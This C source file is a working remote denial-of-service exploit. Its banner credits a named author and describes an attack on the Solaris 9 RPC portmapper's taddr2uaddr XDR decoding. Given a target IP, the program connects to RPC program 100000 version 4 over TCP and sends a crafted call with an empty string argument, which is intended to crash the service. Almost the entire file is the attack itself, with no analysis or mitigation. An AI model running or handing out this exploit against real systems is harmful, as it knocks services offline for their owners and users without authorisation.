
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_3__ TYPE_1__ ;


struct TYPE_3__ {char* string_arg; scalar_t__ long_arg; } ;
typedef TYPE_1__ xdr ;
typedef int CLIENT ;


 int * clnt_create (char*,int,int,char*) ;
 int clnt_destroy (int *) ;
 int clnt_pcreateerror (char*) ;
 int clnt_perror (int *,char*) ;
 int exit (int) ;
 int printf (char*,...) ;
 char** str_4 (TYPE_1__*,int *) ;

main(int argc, char *argv[]) {
  CLIENT *c1;
  char *server;
  char **sresult;


  if (argc !=2){
    printf("=============================================================\n");
    printf("Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS\n");
    printf("-------------------------------------------------------------\n");
    printf("Federico L. Bossi Bonin <fbossi@globalST.com.ar>\n");
    printf("=============================================================\n\n");
    printf("usage: %s <IP>\n",argv[0]);
    exit(1);
  }

  server = argv[1];

if ((c1 = clnt_create(server,100000, 4, "tcp")) == ((void*)0)){
       clnt_pcreateerror(server);
    exit(1);
  }

  xdr xdrmessage;
  xdrmessage.long_arg = 0;
  xdrmessage.string_arg="";

  if ((sresult = str_4(&xdrmessage, c1)) == ((void*)0)){
   clnt_perror(c1, server);
   exit(1);
  }

  clnt_destroy(c1);
  exit(0);
}
